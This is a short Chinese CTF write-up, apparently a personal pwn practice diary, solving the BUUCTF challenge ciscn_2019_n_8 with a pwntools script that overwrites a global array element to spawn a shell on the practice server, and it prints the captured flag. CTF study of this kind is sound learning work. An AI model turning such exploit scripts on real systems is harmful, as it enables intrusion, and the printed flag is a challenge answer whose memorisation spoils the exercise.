导语

pillar的pwn刷题日记

ciscn_2019_n_8

首先checksec

img

开了Canary NX和PIE 是一个32位的程序

运行一下看看

img

IDA打开康康

img

看到有scanf,和一串var,这个var点进去可以看到是一个全局变量,每个成员都是dword,加上他的注释,可以认为var是一个int数组。

同时我们看到逻辑,当var[13]的QWARD是17即可getshell。由此写exp

from pwn import *

sh=remote("node4.buuoj.cn",27187)

payload="AAAA"*13+p64(17) # 因为是QWORD所以要用p64
sh.sendline(payload)
sh.interactive()

img

flag{04aaad59-8795-4aa9-bd50-4a25f8888134}

但是每台搞明白这个v4和v5是咋用的,scanf里int参数是干嘛的呀?